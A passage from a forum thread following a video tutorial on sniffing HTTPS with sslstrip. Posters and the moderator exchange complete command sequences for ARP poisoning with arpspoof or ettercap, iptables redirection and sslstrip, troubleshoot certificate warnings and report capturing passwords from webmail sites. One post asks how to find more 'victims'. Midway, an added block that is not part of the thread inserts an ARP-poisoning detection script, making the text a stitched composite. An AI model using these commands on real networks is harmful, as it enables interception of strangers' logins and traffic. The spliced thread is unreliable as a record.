
Thread: [Video] How to: Snifff SSL / HTTPS (sslstrip)

  1. #61
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    So, I understand in principle and practice how this works... and I am aware that sslstrip offers a lock favicon to give the illusion of a secure connection. However, that lack of the HTTPS in the address bar is a dead giveaway.

    Lately, I've been playing around with Cain & Abel. Besides having a better GUI, C&A seems to be able to maintain the HTTPS as well. What I'm wondering is how does this program accomplish this and how is it different from sslstrip. On the surface, it seems to be the same type of arp poisoning mitm attack.

    Thoughts?

  2. #62
    Just burned their ISO
    Join Date
    May 2010
    Posts
    9

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    thank you for this tutorial, works perfect on my home network.

    my setup : 4 computers connected via wifi

    the only bad thing is the internet speed is terribly slow on the victim machine

    is there a way to avoid the drop of the speed ? better hardware ?

  3. #63
    Just burned his ISO f4llcon's Avatar
    Join Date
    Oct 2010
    Location
    europe
    Posts
    4

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Hello
    g0tmi1k, thank you for the great tut!

    I have a problem with sslstrip. On the victim computer it still shows a warning when I go to hotmail.com or mail.google.com or any other https:// website.

    What am I doing wrong? I retried over and over with your tut and other tuts. But none work.

    Last night i tried it on my other computer on my other network and it worked great with

    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.0.102 192.168.0.1
    iptables --flush
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -a -l 10000
    ettercap -T -q -i wlan0
    cat sslstrip.log | grep -a name*LIKE MSN*

    but now it does not work, so i tried your way.

    kate /etc/etter.conf
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0

    But none work now. I will retry it when I am on my other network, but why isn't it working on this network? I also tried it on one other network but there was the same problem.

    This is a legal question for myself only and I am only using my own 3 networks.

    Thanks, hope to hear what's the problem.

    F4LLCON

  4. #64
    Just burned his ISO aeronavi's Avatar
    Join Date
    Oct 2010
    Location
    Portugal
    Posts
    14

    Default Re: [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Quote Originally Posted by g0tmi1k View Post
    Links

    Commands:
    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0
    
    sslstrip -a -k -f
    ettercap -T -q -i wlan0
    ~g0tmi1k
    If we are using sslstrip, why uncomment redir_command? That command is supposed to sniff SSL traffic, and if we are already using sslstrip, that will bring conflicts between the two, right? Maybe because of that, many people here are having problems with messages saying the cert isn't valid (because that is how redir_command works to get SSL info, from what I know).

    Also, Ettercap forwards all traffic automatically if sniffing; I don't know any command to make it stop doing that, which means if we have ip_forward=1 and Ettercap running, we are forwarding traffic x2 times (you can confirm in Wireshark). Not pretty.

    If i use sslstrip i do just this:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -w sslsniff.txt    # so it writes to a file
    Then just open the file and look for the important fields, it's not difficult.

    Note that to flush iptables, the command
    Code:
    iptables --flush
    will not work, (at least for me).
    You got to use
    Code:
    iptables -t nat --flush

  5. #65
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by Warwulf View Post
    So, I understand in principle and practice how this works... and I am aware that sslstrip offers a lock favicon to give the illusion of a secure connection. However, that lack of the HTTPS in the address bar is a dead giveaway.

    Lately, I've been playing around with Cain & Abel. Besides having a better GUI, C&A seems to be able to maintain the HTTPS as well. What I'm wondering is how does this program accomplish this and how is it different from sslstrip. On the surface, it seems to be the same type of arp poisoning mitm attack.

    Thoughts?
    How is it a "dead giveaway"? I can remember seeing a video (Blackhat 2009) of the author of the software, who ran a modded(*) version on Tor for 24 hours; not one person detected the missing "S"...

    (*) = The modded version didn't record anyone's personal details.
    It would only collect which URLs it was stripping, and if the user did or didn't send a request back. Every person sent the request back (to login).
    He had to check that he had it setup right because he didn't believe it was working correctly!


    Personally, I haven't used Cain & Abel too much so I can't comment that much on it, but as far as I know it's an AIO GUI tool that does HTTPS by "injects fake certificates".
    After doing a quick Google search: CAIN and ABEL Tutorial 2 | Hackers Library, it looks like they get a "pop-up dialog warning about the problem". I haven't tried this so I can't say for sure.
    It also looks like a very old version of IE that they are using....
    SSLStrip = Removes HTTPS
    Cain & Abel = Injects into HTTPS

    Cain also does the MITM attack (via ARP poisoning), whereas SSLStrip doesn't do any MITM'ing; it's down to the user to choose how to do the MITM (as there is more than one!)



    Quote Originally Posted by kamiz9999 View Post
    thank you for this tutorial, works perfect on my home network.

    my setup : 4 computers connected via wifi

    the only bad thing is the internet speed is terribly slow on the victim machine

    is there a way to avoid the drop of the speed ? better hardware ?
    All the traffic on all 4 computers has to go through your computer, therefore it's creating a bottleneck effect. As far as I know the only way to stop it from slowing down is to increase the bandwidth (create a bigger pipe as of such, example move from 100MB to 1GB), or attack less computers at once.



    Quote Originally Posted by f4llcon View Post
    Hello
    g0tmi1k, thank you for the great tut!

    I have a problem with sslstrip. On the victim computer it still shows a warning when I go to hotmail.com or mail.google.com or any other https:// website.

    What am I doing wrong? I retried over and over with your tut and other tuts. But none work.

    Last night i tried it on my other computer on my other network and it worked great with

    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.0.102 192.168.0.1
    iptables --flush
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -a -l 10000
    ettercap -T -q -i wlan0
    cat sslstrip.log | grep -a name*LIKE MSN*

    but now it does not work, so i tried your way.

    kate /etc/etter.conf
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0

    But none work now. I will retry it when I am on my other network, but why isn't it working on this network? I also tried it on one other network but there was the same problem.

    This is a legal question for myself only and I am only using my own 3 networks.

    Thanks, hope to hear what's the problem.

    F4LLCON
    Are you (or is an addon - e.g. ForceTLS) going straight to a HTTPS page (https://mail.google.com)? Or is the page that is being requested forcing HTTPS (I know there is an option in Gmail to enable this)?
    SSLStrip only works if you link to a HTTPS, if the user manually types in HTTPS://, it will not work.

    Few things about the above commands:
    > It doesn't matter which way around you do kate & echo.
    > The target ISN'T the same. Nor is the gateway.
    > I'm not sure if --to-ports (an extra "s" at the end) is a typo or if it matters. It's been a while, and my iptable fu isn't great.
    > SSLStrip's default port is 10000, so you don't need to put it in
    > Did you try and do the last bit, "grepping" on my commands? I dunno what you're trying to sniff.



    Quote Originally Posted by aeronavi View Post
    If we are using sslstrip, why uncomment redir_command? That command is supposed to sniff SSL traffic, and if we are already using sslstrip, that will bring conflicts between the two, right? Maybe because of that, many people here are having problems with messages saying the cert isn't valid (because that is how redir_command works to get SSL info, from what I know).

    Also, Ettercap forwards all traffic automatically if sniffing; I don't know any command to make it stop doing that, which means if we have ip_forward=1 and Ettercap running, we are forwarding traffic x2 times (you can confirm in Wireshark). Not pretty.

    If i use sslstrip i do just this:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -w sslsniff.txt    # so it writes to a file
    Then just open the file and look for the important fields, it's not difficult.

    Note that to flush iptables, the command
    Code:
    iptables --flush
    will not work, (at least for me).
    You got to use
    Code:
    iptables -t nat --flush
    Thanks for the tips aeronavi. I've got to be honest, I haven't used SSLStrip in a while, and it's been even longer since I've used ettercap.
    I agree with you on ettercap enabling ip_forward (handy, but annoying; I also don't know of a way to stop it when doing an MITM attack), as if you were to do:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    1
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    cat /proc/sys/net/ipv4/ip_forward
    1
    ettercap -T -q -M ARP -i wlan0 // //
    cat /proc/sys/net/ipv4/ip_forward
    0
    *Note: that's coming from the top of my head*
    However, I was using arpspoof to do the MITM attack, it doesn't do ip forwarding automatically, hence why I did it.
    I forgot about ettercap doing ip_forward, even when you're not using it to do the MITM attack.

    The reasoning why I did redir_command was that I was demonstrating before and after sslstrip.
    Before I ran SSLStrip, I was using HTTPS with ettercap, hence I needed redir_command.
    After running SSLStrip, I found out that I didn't need to change redir_command back.

    Short answer: Yes, that could be why some people are getting errors due to "redir_command" & "ip_forward". I'm not sure why it works for some but not others at the moment.
    People do keep getting in touch about this, and it's old (also wrong as you pointed out), so I may end up doing an update to it.
    Have you...g0tmi1k?
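
Added example, not part of g0tmi1k's post or of this thread: a defender-side check for the ARP poisoning step the posts above rely on. On a host poisoned the way `arpspoof -t <host> <gateway>` does it, the gateway's IP resolves to a MAC that is not the router's and that another LAN IP may also use. The `ip neigh` sample and MAC addresses are constructed, and the function names are hypothetical.

```shell
#!/bin/sh
# Constructed sample of `ip neigh show` output from a host whose ARP cache has
# been poisoned: gateway 192.168.1.1 and host 192.168.1.5 share one MAC.
SAMPLE_NEIGH='192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.5 dev wlan0 lladdr 00:11:22:33:44:55 STALE
192.168.1.7 dev wlan0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.9 dev wlan0  FAILED'

# Reads `ip neigh` lines on stdin and prints "MAC ip1,ip2,..." for every MAC
# address that more than one IP resolves to.
shared_macs() {
    awk '
        {
            mac = ""
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "" || ((mac, $1) in seen)) next   # unresolved or repeat
            seen[mac, $1] = 1
            ips[mac] = (count[mac]++ ? ips[mac] "," : "") $1
        }
        END { for (m in count) if (count[m] > 1) print m, ips[m] }
    ' | sort
}

# Exit status 0 (alert) when IP $1 resolves to a MAC other than the known-good
# MAC $2; status 1 when it matches or the IP has no resolved entry.
gateway_mismatch() {
    awk -v ip="$1" -v want="$2" '
        $1 == ip {
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") got = tolower($(i + 1))
        }
        END { if (got != "" && got != tolower(want)) exit 0; exit 1 }
    '
}

# Demo on the constructed sample; on a live host pipe `ip neigh show` instead.
printf '%s\n' "$SAMPLE_NEIGH" | shared_macs
```

The shared-MAC check only fires if the host also holds an entry for the other machine's real IP; the known-good gateway MAC comparison covers the case where it does not.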

  6. #66
    Just burned his ISO
    Join Date
    Oct 2010
    Location
    Sweden
    Posts
    4

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Absolutely great tutorial!


    Wrote earlier I was experiencing some trouble with sslstrip and the Iptables.
    NEVERMIND!
    I did forward it to --to-ports 10000
    changed it to 8080 and now it works great!

    Thanks man!

  7. #67
    Just burned his ISO
    Join Date
    May 2010
    Location
    cyberspace
    Posts
    10

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    10x man for the tutorial i rly love it easy simple and effective

  8. #68
    Just burned his ISO
    Join Date
    Jan 2011
    Posts
    1

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Thanks for great video!

    I have a problem doing this on my new NETGEAR router. All computers that were connected to this new router get an IP: 10.0.0.X and the router IP gateway is: 10.0.0.1

    Ettercap only finds 10.0.0.1, the router default gateway, when I scan; the other computers that are connected to it don't show up, I can't find them. Why's that? Is it too well secured? What do I do to see the other victims who are connected to this router?

  9. #69
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    2

    Default Re : [Video] How to: Snifff SSL / HTTPS (sslstrip)

    First of all thanks to g0tmi1k for this amazing tutorial !

    However I was able to sniff SSL passwords without typing all these commands. All I did was uncomment the 2 lines from /etc/etter.conf then run Ettercap with ARP Poisoning. Then I was able to sniff all SSL passwords without problem. What am I doing wrong?

    2nd question: I hacked my own network (I'm the admin) with Ettercap. Do I need to delete the fake certificates installed on the victim's computer during the test? If I don't delete them, is it possible for a hacker who breaks into my network to "reuse" these fake certificates? Thanks.

  10. #70
    Just burned his ISO
    Join Date
    Feb 2011
    Location
    The Milky Way
    Posts
    3

    Thumbs up Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    I g0t Mi1k!
    Thanks a lot for this, took a bit of tweaking to get things going smoothly but in the end everything was peachy! Again, thank you!

    So this was my first successful 'hack', if you will! Like I said it took a bit of tweaking to get going, but any bumps I hit were because I lacked a full understanding of what I was doing... So I'm just gonna list off a couple of things I'm uncertain of.

    So I'm on my own private address space on my little LAN. Finest.
    I'm using Ettercap's GUI to carry out the ARP spoofing. - failed on my first attempt to execute this in Shell, I'll get back to it later. For now the GUI will suffice.

    Our first command:
    Code:
    echo 1 >/proc/sys/net/ipv4/ip_forward
    What exactly is happening here? I examined the file hoping for a hint as to what this is & what it's doing - but to no avail. What kind of file is this?
    I'm taking a stab at what this command does.
    Are we simply setting our attacking machine to allow forwarding of any IPs that we intercept?

    After that I think I understand what's happening... so ya that's all for now!
    Where should my step in security exploits be, any recommendations?

    Thanks again g0tMi1k.
    Hugs etc etc


    P.S.

    I tested this out on the following:
    Gmail
    Hotmail (Cert warning flashed up once after logon.)
    (Chrome, page layout distorted after logon)
    Vodafone.com
    warez-bb

    Browsers:
    Opera
    Chrome
    Firefox

    All was well.
